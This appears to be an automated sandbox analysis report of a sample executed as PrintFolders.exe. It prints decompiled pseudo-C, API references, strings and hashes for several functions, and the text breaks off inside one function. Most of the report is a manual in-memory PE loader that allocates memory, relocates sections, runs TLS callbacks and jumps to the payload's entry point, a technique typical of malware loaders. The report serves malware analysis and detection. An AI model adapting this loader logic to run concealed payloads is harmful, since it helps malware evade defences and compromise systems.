
Uniqueness

Uniqueness Score: -1.00%

Function 004027EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E004027EC(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				char _v8;
				void* _t14;
				intOrPtr _t20;
				void* _t23;
				intOrPtr _t26;

				_push(0);
				_push(_t26);
				_push("\xef\xbf\				_push( *[fs:eax]);
				 *[fs:eax] = _t26;
				_t14 = E00402780(GetCommandLineA(),  &_v8);
				_t23 = 0;
				while(1) {
					_t14 = E00402780(_t14,  &_v8);
					if(_v8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(E00402845);
				return E00403548( &_v8);
			}

0x004027ef
0x004027f6
0x004027f7
0x004027fc
0x004027ff
0x0040280f
0x00402811
0x00402813
0x0040281d
0x00402823
0x00000000
0x00000000
0x00402825
0x00402825
0x0040282a
0x0040282d
0x00402830
0x0040283d

APIs

GetCommandLineA.KERNEL32(00000000,i,?,AUTOMATION,004314D0,00000001,00000000,?,004316CF,00000000,0043173A,?,?,004314D0,00000001,00000000), ref: 00402802

Strings

AUTOMATION, xrefs: 004027F3
i, xrefs: 004027F7

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CommandLine
String ID: AUTOMATION$i
API String ID: 3253501508-2573797198
Opcode ID: ae67477c744024a6e7c2ac692df6760e5d4b638f78726258859dcd5773796150
Instruction ID: 1d02eac51ef4009498f5db1f058e76f7186e7b059260ff6a50aebf8a4045dc95
Opcode Fuzzy Hash: ae67477c744024a6e7c2ac692df6760e5d4b638f78726258859dcd5773796150
Instruction Fuzzy Hash: D0F0E23A200208AFD711EA61CE06A5A76ACEB49704FA18476B800B31D1D2FC1E04C198

Uniqueness

Uniqueness Score: -1.00%

Function 0040348C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040348C() {

				E00403444();
				 *0x48d014 = GetModuleHandleA(0);
				 *0x48d01c = GetCommandLineA();
				 *0x48d018 = 0xa;
				return 0x4031e4;
			}

0x0040348c
0x00403498
0x004034a3
0x004034a9
0x004034b8

APIs

GetModuleHandleA.KERNEL32(00000000,0048B282), ref: 00403493
GetCommandLineA.KERNEL32(00000000,0048B282), ref: 0040349E

Strings

`5], xrefs: 004034A3

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CommandHandleLineModule
String ID: `5]
API String ID: 2123368496-8256973
Opcode ID: b8b903d3e3261c999887b3c8c484aa6de482f4cf390c4cba503140b8ff5f7b5e
Instruction ID: 9004ed82e953d0a7964876c8a70c4593f2c9d11ead711221e392cea04e77b1f6
Opcode Fuzzy Hash: b8b903d3e3261c999887b3c8c484aa6de482f4cf390c4cba503140b8ff5f7b5e
Instruction Fuzzy Hash: 85C00270D0120096DB506F66540530C6B94974A70DF80487FE104BE2E1DA7D43065B9E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: PrintFolders.exePID: 4532, Parent PID: 6080COMMON

Execution Graph

Execution Coverage:	7.3%
Dynamic/Decrypted Code Coverage:	1.3%
Signature Coverage:	9.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	28

Executed Functions

Function 00402F20 Relevance: 37.3, APIs: 11, Strings: 10, Instructions: 504
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E00402F20(signed int* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v40;
				char _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _v72;
				long _v76;
				intOrPtr _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t181;
				void* _t190;
				long _t192;
				long _t197;
				void* _t198;
				void* _t202;
				void* _t204;
				signed int _t206;
				signed int _t207;
				signed int _t212;
				void* _t214;
				intOrPtr _t215;
				intOrPtr* _t218;
				intOrPtr* _t224;
				signed int* _t226;
				signed int* _t229;
				void* _t234;
				signed int _t235;
				signed int _t236;
				signed char _t237;
				void _t238;
				signed int _t241;
				void* _t250;
				void* _t259;
				void* _t266;
				intOrPtr _t269;
				signed int _t279;
				signed char _t280;
				signed int _t281;
				void* _t282;
				signed int _t284;
				signed int _t291;
				signed int _t292;
				signed int _t294;
				void* _t297;
				intOrPtr _t306;
				intOrPtr _t310;
				void* _t315;
				void* _t324;
				signed int _t326;
				signed short* _t327;
				void* _t328;
				signed int _t330;
				long _t333;
				long _t334;
				void* _t335;
				void* _t336;
				void* _t337;
				void* _t338;
				signed int _t339;
				signed int _t340;
				signed int _t341;
				void* _t342;
				void* _t343;
				void* _t344;
				intOrPtr _t346;
				void* _t348;
				void* _t350;
				void* _t352;
				intOrPtr _t353;
				void* _t354;
				void* _t355;
				void* _t356;
				intOrPtr* _t357;
				signed int _t361;
				signed int _t363;
				void* _t364;
				intOrPtr _t366;
				signed int _t368;
				intOrPtr _t369;
				void* _t370;
				void* _t371;
				void* _t372;
				signed int _t373;
				void* _t374;
				void* _t375;
				void* _t376;

				_t181 =  *0x43d054; // 0x7bd02ead
				_v8 = _t181 ^ _t373;
				_t276 = __edx;
				_t322 = __ecx;
				_t346 = 0;
				_v56 = __edx;
				_v48 = __ecx;
				if(__edx >= 0x40) {
					if( *__ecx == 0x5a4d) {
						_t279 = __ecx[0xf];
						_v68 = _t279;
						if(__edx >= _t279 + 0xf8) {
							_t276 = __ecx + _t279;
							_v64 = _t276;
							if( *(__ecx + _t279) == 0x4550) {
								if( *((intOrPtr*)(_t276 + 4)) == 0x14c) {
									_t280 =  *(_t276 + 0x38);
									if((_t280 & 0x00000001) == 0) {
										_t330 =  *(_t276 + 6) & 0x0000ffff;
										_t324 = ( *(_t276 + 0x14) & 0x0000ffff) + 0x24;
										if(_t330 != 0) {
											_t328 = _t324 + _t276;
											do {
												_t269 =  *((intOrPtr*)(_t328 + 4));
												_t328 = _t328 + 0x28;
												_t314 =  !=  ? _t269 : _t280;
												_t315 = ( !=  ? _t269 : _t280) +  *((intOrPtr*)(_t328 - 0x28));
												_t316 =  <=  ? _t346 : _t315;
												_t346 =  <=  ? _t346 : _t315;
												_t280 =  *(_t276 + 0x38);
												_t330 = _t330 - 1;
											} while (_t330 != 0);
										}
										__imp__GetNativeSystemInfo( &_v44); // executed
										_t281 = _v40;
										_t322 =  !(_t281 - 1);
										_t333 = _t281 - 0x00000001 +  *((intOrPtr*)(_t276 + 0x50)) & _t322;
										if(_t333 == (_t281 - 0x00000001 + _t346 & _t322)) {
											_t190 = VirtualAlloc( *(_t276 + 0x34), _t333, 0x3000, 4); // executed
											_v72 = _t190;
											if(_t190 != 0) {
												L22:
												_t192 = HeapAlloc(GetProcessHeap(), 8, 0x40);
												_t282 = _v72;
												_t334 = _t192;
												_v76 = _t334;
												if(_t334 != 0) {
													 *(_t334 + 4) = _t282;
													 *((intOrPtr*)(_t334 + 0x1c)) = E00402E90;
													 *(_t334 + 0x14) = ( *(_t276 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
													 *((intOrPtr*)(_t334 + 0x20)) = E00402EB0;
													 *((intOrPtr*)(_t334 + 0x24)) = E00402ED0;
													 *((intOrPtr*)(_t334 + 0x28)) = E00402EE0;
													 *((intOrPtr*)(_t334 + 0x2c)) = E00402F00;
													 *((intOrPtr*)(_t334 + 0x34)) = 0;
													 *(_t334 + 0x3c) = _v40;
													_t197 =  *(_t276 + 0x54);
													if(_v56 >= _t197) {
														_t198 = VirtualAlloc(_t282, _t197, 0x1000, 4); // executed
														_t348 = _t198;
														E004104C0(_t348, _v48,  *(_t276 + 0x54));
														_t375 = _t374 + 0xc;
														_v60 = 0;
														_t202 = _t348 + _v48[0xf];
														 *_t334 = _t202;
														 *((intOrPtr*)(_t202 + 0x34)) = _v72;
														_t284 =  *_t334;
														_t322 =  *(_t334 + 4);
														_v52 = _t322;
														_t204 = ( *(_t284 + 0x14) & 0x0000ffff) + 0x24;
														if(0 >=  *(_t284 + 6)) {
															L40:
															_t206 =  *((intOrPtr*)(_t284 + 0x34)) -  *(_t276 + 0x34);
															_v64 = _t206;
															if(_t206 == 0) {
																L52:
																_t207 = 1;
															} else {
																if( *((intOrPtr*)(_t284 + 0xa4)) != 0) {
																	_t322 =  *(_t334 + 4);
																	_t276 =  *((intOrPtr*)(_t284 + 0xa0)) + _t322;
																	_v56 = _t322;
																	_t238 =  *_t276;
																	if(_t238 != 0) {
																		do {
																			_t306 =  *((intOrPtr*)(_t276 + 4));
																			_v68 = _t238 + _t322;
																			_t327 = _t276 + 8;
																			_t364 = 0;
																			if((_t306 - 0x00000008 & 0xfffffffe) > 0) {
																				_t341 = _v68;
																				asm("o16 nop [eax+eax]");
																				do {
																					_t241 =  *_t327 & 0x0000ffff;
																					if((_t241 & 0x0000f000) == 0x3000) {
																						 *((intOrPtr*)((_t241 & 0x00000fff) + _t341)) =  *((intOrPtr*)((_t241 & 0x00000fff) + _t341)) + _v64;
																					}
																					_t306 =  *((intOrPtr*)(_t276 + 4));
																					_t364 = _t364 + 1;
																					_t327 =  &(_t327[1]);
																				} while (_t364 < _t306 - 8 >> 1);
																			}
																			_t238 =  *(_t276 + _t306);
																			_t276 = _t276 + _t306;
																			_t322 = _v56;
																		} while (_t238 != 0);
																		_t334 = _v76;
																	}
																	goto L52;
																} else {
																	_t207 = 0;
																}
															}
															 *((intOrPtr*)(_t334 + 0x18)) = _t207;
															if(E00402D20(_t334) == 0) {
																goto L27;
															} else {
																_t276 =  *_t334;
																_t352 = _t276 + ( *(_t276 + 0x14) & 0x0000ffff);
																_t212 =  *(_t352 + 0x20);
																_t291 =  ~( *(_t334 + 0x3c)) & _t212;
																_v64 = _t291;
																_v92 = _t291;
																_t292 =  *((intOrPtr*)(_t352 + 0x28));
																_v60 = _t212;
																_v96 = _t212;
																if(_t292 == 0) {
																	_t237 =  *(_t352 + 0x3c);
																	if((_t237 & 0x00000040) == 0) {
																		if(_t237 < 0) {
																			_t292 =  *((intOrPtr*)(_t276 + 0x24));
																		}
																	} else {
																		_t292 =  *((intOrPtr*)(_t276 + 0x20));
																	}
																}
																_t326 =  *(_t352 + 0x3c);
																_v88 = _t292;
																_v84 = _t326;
																_v80 = 0;
																_v68 = 1;
																if(1 >=  *(_t276 + 6)) {
																	L76:
																	_t322 =  &_v96;
																	_v80 = 1;
																	_t214 = E00402BF0(_t276, _t334,  &_v96); // executed
																	if(_t214 == 0) {
																		goto L27;
																	} else {
																		_t322 =  *_t334;
																		_t294 = _t322;
																		_t353 =  *((intOrPtr*)(_t322 + 0xc0));
																		if(_t353 != 0) {
																			_t276 =  *(_t334 + 4);
																			_t357 =  *((intOrPtr*)(_t276 + _t353 + 0xc));
																			if(_t357 != 0) {
																				_t224 =  *_t357;
																				if(_t224 != 0) {
																					do {
																						 *_t224(_t276, 1, 0);
																						_t224 =  *((intOrPtr*)(_t357 + 4));
																						_t357 = _t357 + 4;
																					} while (_t224 != 0);
																					_t294 =  *_t334;
																				}
																			}
																		}
																		_t215 =  *((intOrPtr*)(_t294 + 0x28));
																		if(_t215 == 0) {
																			 *((intOrPtr*)(_t334 + 0x38)) = 0;
																			_pop(_t336);
																			_pop(_t354);
																			return E0040EBBF(_t334, _t276, _v8 ^ _t373, _t322, _t336, _t354);
																		} else {
																			_t297 = _v72;
																			_t218 = _t215 + _t297;
																			if( *(_t334 + 0x14) == 0) {
																				 *((intOrPtr*)(_t334 + 0x38)) = _t218;
																				_pop(_t337);
																				_pop(_t355);
																				return E0040EBBF(_t334, _t276, _v8 ^ _t373, _t322, _t337, _t355);
																			} else {
																				_push(0);
																				_push(1);
																				_push(_t297);
																				if( *_t218() != 0) {
																					 *((intOrPtr*)(_t334 + 0x10)) = 1;
																					_pop(_t338);
																					_pop(_t356);
																					return E0040EBBF(_t334, _t276, _v8 ^ _t373, _t322, _t338, _t356);
																				} else {
																					SetLastError(0x45a);
																					goto L26;
																				}
																			}
																		}
																	}
																} else {
																	_t226 = _t352 + 0x64;
																	_v48 = _t226;
																	do {
																		_v56 =  *((intOrPtr*)(_t226 - 0x1c));
																		_t339 =  *((intOrPtr*)(_t226 - 0x14));
																		_t361 =  ~( *(_t334 + 0x3c)) & _v56;
																		_v52 = _t339;
																		_t334 = _v76;
																		if(_t339 == 0) {
																			if(( *_t226 & 0x00000040) == 0) {
																				if(( *_t226 & 0x00000080) != 0) {
																					_t340 =  *((intOrPtr*)(_t276 + 0x24));
																					goto L66;
																				}
																			} else {
																				_t340 =  *((intOrPtr*)(_t276 + 0x20));
																				L66:
																				_v52 = _t340;
																				_t334 = _v76;
																			}
																		}
																		if(_v64 == _t361) {
																			L72:
																			_t326 = _t326 |  *_t226;
																			asm("bt eax, 0x19");
																			if(_t326 >= 0) {
																				_t326 = _t326 & 0xfdffffff;
																			}
																			_t292 = _v52 - _v60 + _v56;
																			_t229 = _v48;
																			goto L75;
																		} else {
																			if(_v60 + _t292 > _t361) {
																				_t226 = _v48;
																				goto L72;
																			} else {
																				_t322 =  &_v96;
																				_t234 = E00402BF0(_t276, _t334,  &_v96); // executed
																				if(_t234 == 0) {
																					goto L27;
																				} else {
																					_t235 = _v56;
																					_t292 = _v52;
																					_t276 =  *_t334;
																					_v60 = _t235;
																					_v96 = _t235;
																					_t236 = _t361;
																					_v64 = _t236;
																					_v92 = _t236;
																					_t229 = _v48;
																					_t326 =  *_t229;
																					goto L75;
																				}
																			}
																		}
																		goto L90;
																		L75:
																		_v48 =  &(_t229[0xa]);
																		_t363 = _v68 + 1;
																		_v84 = _t326;
																		_t226 = _v48;
																		_v88 = _t292;
																		_v68 = _t363;
																	} while (_t363 < ( *(_t276 + 6) & 0x0000ffff));
																	goto L76;
																}
															}
														} else {
															_t276 = _t204 + _t284;
															do {
																_t310 =  *((intOrPtr*)(_t276 + 4));
																if(_t310 != 0) {
																	if(_v56 <  *(_t276 + 8) + _t310) {
																		goto L25;
																	} else {
																		_t250 =  *((intOrPtr*)( *((intOrPtr*)(_t334 + 0x1c))))( *_t276 + _t322, _t310, 0x1000, 4,  *((intOrPtr*)(_t334 + 0x34))); // executed
																		_t376 = _t375 + 0x14;
																		if(_t250 == 0) {
																			goto L27;
																		} else {
																			_t366 =  *_t276 + _v52;
																			E004104C0(_t366, _v48 +  *(_t276 + 8),  *((intOrPtr*)(_t276 + 4)));
																			 *((intOrPtr*)(_t276 - 4)) = _t366;
																			goto L37;
																		}
																	}
																} else {
																	_t369 =  *((intOrPtr*)( &(_v48[0xe]) + _v68));
																	if(_t369 <= 0) {
																		goto L38;
																	} else {
																		_t259 =  *((intOrPtr*)( *((intOrPtr*)(_t334 + 0x1c))))( *_t276 + _t322, _t369, 0x1000, 4,  *((intOrPtr*)(_t334 + 0x34)));
																		_t376 = _t375 + 0x14;
																		if(_t259 == 0) {
																			goto L27;
																		} else {
																			 *((intOrPtr*)(_t276 - 4)) =  *_t276 + _v52;
																			E00410B00(_t334,  *_t276 + _v52, 0, _t369);
																			L37:
																			_t322 = _v52;
																			_t375 = _t376 + 0xc;
																			goto L38;
																		}
																	}
																}
																goto L90;
																L38:
																_t284 =  *_t334;
																_t276 = _t276 + 0x28;
																_t368 = _v60 + 1;
																_v60 = _t368;
															} while (_t368 < ( *(_t284 + 6) & 0x0000ffff));
															_t276 = _v64;
															goto L40;
														}
													} else {
														L25:
														SetLastError(0xd);
														L26:
														L27:
														E00403680(_t334);
														_pop(_t335);
														_pop(_t350);
														return E0040EBBF(0, _t276, _v8 ^ _t373, _t322, _t335, _t350);
													}
												} else {
													VirtualFree(_t282, _t192, 0x8000);
													SetLastError(0xe);
													goto L5;
												}
											} else {
												_t266 = VirtualAlloc(_t190, _t333, 0x3000, 4);
												_v72 = _t266;
												if(_t266 != 0) {
													goto L22;
												} else {
													_push("ERROR_OUTOFMEMORY!\n");
													E00402BC0();
													SetLastError(0xe);
													goto L5;
												}
											}
										} else {
											_push("alignedImageSize != AlignValueUp!\n");
											goto L4;
										}
									} else {
										_push("Section alignment invalid!\n");
										goto L4;
									}
								} else {
									_push("FileHeader.Machine != HOST_MACHINE!\n");
									goto L4;
								}
							} else {
								_push("Signature != IMAGE_NT_SIGNATURE!\n");
								goto L4;
							}
						} else {
							SetLastError(0xd);
							_push("DOS header size is not valid!\n");
							E00402BC0();
							_pop(_t343);
							_pop(_t371);
							_t9 =  &_v8; // 0x402b76
							return E0040EBBF(0, _t276,  *_t9 ^ _t373, _t322, _t343, _t371);
						}
					} else {
						_push("DOS header is not valid!\n");
						L4:
						E00402BC0();
						SetLastError(0xc1);
						L5:
						_pop(_t342);
						_pop(_t370);
						_t5 =  &_v8; // 0x402b76
						return E0040EBBF(0, _t276,  *_t5 ^ _t373, _t322, _t342, _t370);
					}
				} else {
					SetLastError(0xd);
					_push("Size is not valid!\n");
					E00402BC0();
					_pop(_t344);
					_pop(_t372);
					_t4 =  &_v8; // 0x402b76
					return E0040EBBF(0, _t276,  *_t4 ^ _t373, _t322, _t344, _t372);
				}
				L90:
			}

0x00402f26
0x00402f2d
0x00402f31
0x00402f33
0x00402f36
0x00402f38
0x00402f3b
0x00402f42
0x00402f74
0x00402fa1
0x00402fa4
0x00402faf
0x00402fe0
0x00402fe3
0x00402fe6
0x00402ff8
0x00403004
0x0040300a
0x0040301a
0x0040301e
0x00403023
0x00403025
0x00403027
0x00403027
0x0040302a
0x0040302f
0x00403032
0x00403037
0x0040303a
0x0040303c
0x0040303f
0x0040303f
0x00403027
0x00403048
0x0040304e
0x00403057
0x00403061
0x00403067
0x00403084
0x00403086
0x0040308b
0x004030b3
0x004030be
0x004030c4
0x004030c7
0x004030c9
0x004030ce
0x004030e4
0x004030f1
0x004030f8
0x004030fb
0x00403102
0x00403109
0x00403110
0x00403117
0x00403121
0x00403124
0x0040312a
0x00403157
0x0040315c
0x00403162
0x0040316a
0x00403170
0x0040317a
0x0040317e
0x00403180
0x00403183
0x00403185
0x00403188
0x0040318f
0x00403196
0x0040324f
0x00403252
0x00403255
0x00403258
0x004032dd
0x004032dd
0x0040325e
0x00403265
0x0040326b
0x00403274
0x00403276
0x00403279
0x0040327d
0x00403280
0x00403280
0x00403285
0x00403288
0x0040328b
0x00403295
0x00403297
0x0040329a
0x004032a0
0x004032a0
0x004032b1
0x004032bb
0x004032bb
0x004032be
0x004032c1
0x004032c2
0x004032ca
0x004032a0
0x004032ce
0x004032d1
0x004032d3
0x004032d6
0x004032da
0x004032da
0x00000000
0x00403267
0x00403267
0x00403267
0x00403265
0x004032e4
0x004032ee
0x00000000
0x004032f4
0x004032f4
0x004032ff
0x00403301
0x00403304
0x00403306
0x00403309
0x0040330c
0x0040330f
0x00403312
0x00403317
0x00403319
0x0040331e
0x00403327
0x00403329
0x00403329
0x00403320
0x00403320
0x00403320
0x0040331e
0x0040332c
0x00403334
0x00403337
0x0040333a
0x00403341
0x0040334c
0x00403415
0x00403415
0x00403418
0x00403421
0x00403428
0x00000000
0x0040342e
0x0040342e
0x00403430
0x00403432
0x0040343a
0x0040343c
0x0040343f
0x00403445
0x00403447
0x0040344b
0x00403450
0x00403455
0x00403457
0x0040345a
0x0040345d
0x00403461
0x00403461
0x0040344b
0x00403445
0x00403463
0x00403468
0x004034bf
0x004034c8
0x004034c9
0x004034d3
0x0040346a
0x0040346a
0x0040346d
0x00403473
0x004034a4
0x004034a9
0x004034aa
0x004034b9
0x00403475
0x00403475
0x00403477
0x00403479
0x0040347e
0x0040348a
0x00403493
0x00403494
0x004034a3
0x00403480
0x0040312e
0x00000000
0x0040312e
0x0040347e
0x00403473
0x00403468
0x00403352
0x00403352
0x00403355
0x00403360
0x00403363
0x00403369
0x0040336e
0x00403373
0x00403376
0x00403379
0x0040337e
0x00403388
0x0040338a
0x00000000
0x0040338a
0x00403380
0x00403380
0x0040338d
0x0040338d
0x00403390
0x00403390
0x0040337e
0x00403396
0x004033d3
0x004033d9
0x004033db
0x004033df
0x004033e1
0x004033e1
0x004033ed
0x004033f0
0x00000000
0x00403398
0x0040339f
0x004033d0
0x00000000
0x004033a1
0x004033a1
0x004033a6
0x004033ad
0x00000000
0x004033b3
0x004033b3
0x004033b6
0x004033b9
0x004033bb
0x004033be
0x004033c1
0x004033c3
0x004033c6
0x004033c9
0x004033cc
0x00000000
0x004033cc
0x004033ad
0x0040339f
0x00000000
0x004033f3
0x004033f9
0x004033fc
0x00403403
0x00403406
0x00403409
0x0040340c
0x0040340c
0x00000000
0x00403360
0x0040334c
0x0040319c
0x0040319c
0x004031a0
0x004031a0
0x004031a5
0x004031f0
0x00000000
0x004031f6
0x00403209
0x0040320b
0x00403210
0x00000000
0x00403216
0x00403221
0x00403226
0x0040322b
0x00000000
0x0040322b
0x00403210
0x004031a7
0x004031ad
0x004031b3
0x00000000
0x004031b5
0x004031c8
0x004031ca
0x004031cf
0x00000000
0x004031d5
0x004031de
0x004031e1
0x0040322e
0x0040322e
0x00403231
0x00000000
0x00403231
0x004031cf
0x004031b3
0x00000000
0x00403234
0x00403234
0x00403236
0x0040323c
0x0040323d
0x00403244
0x0040324c
0x00000000
0x0040324c
0x0040312c
0x0040312c
0x0040312e
0x0040312e
0x00403134
0x00403136
0x0040313d
0x0040313e
0x0040314d
0x0040314d
0x004030d0
0x004030d7
0x00402f88
0x00000000
0x00402f88
0x0040308d
0x00403096
0x00403098
0x0040309d
0x00000000
0x0040309f
0x0040309f
0x004030a4
0x00402f88
0x00000000
0x00402f88
0x0040309d
0x00403069
0x00403069
0x00000000
0x00403069
0x0040300c
0x0040300c
0x00000000
0x0040300c
0x00402ffa
0x00402ffa
0x00000000
0x00402ffa
0x00402fe8
0x00402fe8
0x00000000
0x00402fe8
0x00402fb1
0x00402fb3
0x00402fb9
0x00402fbe
0x00402fc8
0x00402fc9
0x00402fcb
0x00402fd8
0x00402fd8
0x00402f76
0x00402f76
0x00402f7b
0x00402f7b
0x00402f88
0x00402f88
0x00402f90
0x00402f91
0x00402f93
0x00402fa0
0x00402fa0
0x00402f44
0x00402f46
0x00402f4c
0x00402f51
0x00402f5b
0x00402f5c
0x00402f5e
0x00402f6b
0x00402f6b
0x00000000

APIs

SetLastError.KERNEL32(0000000D,?), ref: 00402F46
SetLastError.KERNEL32(000000C1), ref: 00402F88

Strings

DOS header size is not valid!, xrefs: 00402FB9
Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402FE8
ERROR_OUTOFMEMORY!, xrefs: 0040309F
alignedImageSize != AlignValueUp!, xrefs: 00403069
Size is not valid!, xrefs: 00402F4C
v+@, xrefs: 00402F93, 00402FCB, 00402F5E
FileHeader.Machine != HOST_MACHINE!, xrefs: 00402FFA
@, xrefs: 00402F3F
Section alignment invalid!, xrefs: 0040300C
DOS header is not valid!, xrefs: 00402F76

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID: @$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!$v+@
API String ID: 1452528299-3666885587
Opcode ID: ce0b6ba3c7f08ce00cb437c0cd81f476a8ad27299f5e07271d5d503724786e68
Instruction ID: ee8b362cb5bcb5acb02f75210dba8d77fdcb81ba509aa6813b7c3456fb0d570c
Opcode Fuzzy Hash: ce0b6ba3c7f08ce00cb437c0cd81f476a8ad27299f5e07271d5d503724786e68
Instruction Fuzzy Hash: 92128C71A012159BCB14CFA9D981BADBBB5FF48305F14416AE809AB3C1D7B8ED41CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004056A0 Relevance: 35.5, APIs: 11, Strings: 9, Instructions: 514
sleepCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E004056A0(void* __ebx, void* __ecx, void* __edi) {
				long _v8;
				intOrPtr* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v96;
				struct _SID_IDENTIFIER_AUTHORITY _v104;
				long _v108;
				void* _v112;
				void* _v116;
				char _v284;
				char _v288;
				int _v292;
				char _v296;
				char _v300;
				long _v304;
				long _v308;
				intOrPtr _v312;
				char _v313;
				long _v320;
				long _v324;
				long _v328;
				long _v332;
				long _v340;
				long* _v344;
				long _v348;
				long _v352;
				long _v356;
				long _v364;
				long _v372;
				char _v428;
				signed int _v432;
				long _v696;
				intOrPtr _v700;
				signed int _v792;
				short _v872;
				long _v876;
				void* _v884;
				void* __esi;
				void* __ebp;
				signed int _t234;
				signed int _t235;
				intOrPtr _t238;
				signed char _t239;
				signed char _t240;
				CHAR _t245;
				void* _t248;
				signed char _t252;
				signed int _t253;
				intOrPtr _t258;
				void* _t261;
				intOrPtr _t262;
				signed char _t263;
				signed char _t264;
				intOrPtr _t269;
				void* _t272;
				struct HWND__* _t273;
				intOrPtr _t275;
				void* _t279;
				intOrPtr* _t280;
				long _t285;
				void* _t286;
				signed int _t289;
				signed int _t290;
				intOrPtr _t293;
				signed char _t294;
				signed int _t295;
				signed int _t297;
				int _t298;
				intOrPtr _t300;
				signed char _t301;
				signed int _t302;
				signed int _t304;
				intOrPtr _t305;
				signed char _t306;
				signed int _t307;
				signed int _t309;
				struct HWND__* _t310;
				intOrPtr _t312;
				signed int _t313;
				signed int _t318;
				long _t319;
				signed int _t324;
				signed int _t328;
				signed int _t333;
				signed int _t337;
				int _t338;
				long _t343;
				intOrPtr _t347;
				signed char _t348;
				signed int _t349;
				signed int _t354;
				signed int _t355;
				signed int _t360;
				signed int _t366;
				signed int _t371;
				signed int _t376;
				void* _t382;
				void* _t386;
				void* _t388;
				void* _t390;
				void* _t392;
				intOrPtr _t393;
				void* _t395;
				void* _t397;
				struct HWND__* _t398;
				intOrPtr _t400;
				void* _t404;
				long _t407;
				long _t411;
				long _t420;
				long _t424;
				long _t433;
				long _t437;
				void* _t448;
				void* _t449;
				void* _t451;
				intOrPtr _t452;
				void* _t454;
				signed int _t456;
				void* _t457;
				void* _t458;
				signed char* _t459;
				CHAR* _t462;
				signed int* _t470;
				intOrPtr* _t473;
				signed char* _t477;
				intOrPtr* _t480;
				intOrPtr* _t485;
				intOrPtr* _t488;
				signed char* _t489;
				signed char* _t496;
				signed char* _t499;
				intOrPtr* _t503;
				long _t506;
				long _t511;
				signed char* _t512;
				void* _t518;
				intOrPtr* _t520;
				long _t523;
				long _t524;
				signed char* _t525;
				void* _t526;
				long _t528;
				long _t529;
				signed int* _t530;
				void* _t531;
				long _t533;
				signed char* _t534;
				void* _t535;
				long _t537;
				void* _t538;
				intOrPtr* _t539;
				void* _t541;
				long* _t542;
				void* _t543;
				void* _t544;
				void* _t545;
				void* _t546;
				void* _t548;
				void* _t549;
				intOrPtr _t550;
				signed char* _t552;
				void* _t553;
				signed char* _t554;
				signed char* _t555;
				intOrPtr _t556;
				intOrPtr _t560;
				void* _t561;
				intOrPtr* _t562;
				intOrPtr _t564;
				void* _t565;
				void* _t567;
				intOrPtr* _t568;
				signed int _t569;
				void* _t570;
				signed int _t571;
				signed int _t572;
				void* _t573;
				void* _t574;
				signed int _t576;
				void* _t577;
				long* _t578;
				long* _t579;
				long* _t580;
				long* _t581;
				long* _t582;
				long* _t583;
				signed int _t584;

				_t458 = __ecx;
				_t447 = __ebx;
				_push(0xffffffff);
				_push(E0042C6B1);
				_push( *[fs:0x0]);
				_t574 = _t573 - 0x168;
				_t234 =  *0x43d054; // 0x7bd02ead
				_t235 = _t234 ^ _t569;
				_v24 = _t235;
				_push(__ebx);
				_push(__edi);
				_push(_t235);
				 *[fs:0x0] =  &_v16;
				_v324 = 0;
				_v308 = 0;
				_v304 = 0xf;
				_v324 = 0;
				_v8 = 0;
				_v296 = 0x47434a4f;
				_v292 = 0x2e40;
				_t560 =  *((intOrPtr*)( *[fs:0x2c]));
				_t238 =  *0x450ef4; // 0x0
				if(_t238 >  *((intOrPtr*)(_t560 + 4))) {
					E0040EF48(_t238, 0x450ef4);
					_t574 = _t574 + 4;
					_t594 =  *0x450ef4 - 0xffffffff;
					if( *0x450ef4 == 0xffffffff) {
						_t11 =  &_v296; // 0x47434a4f
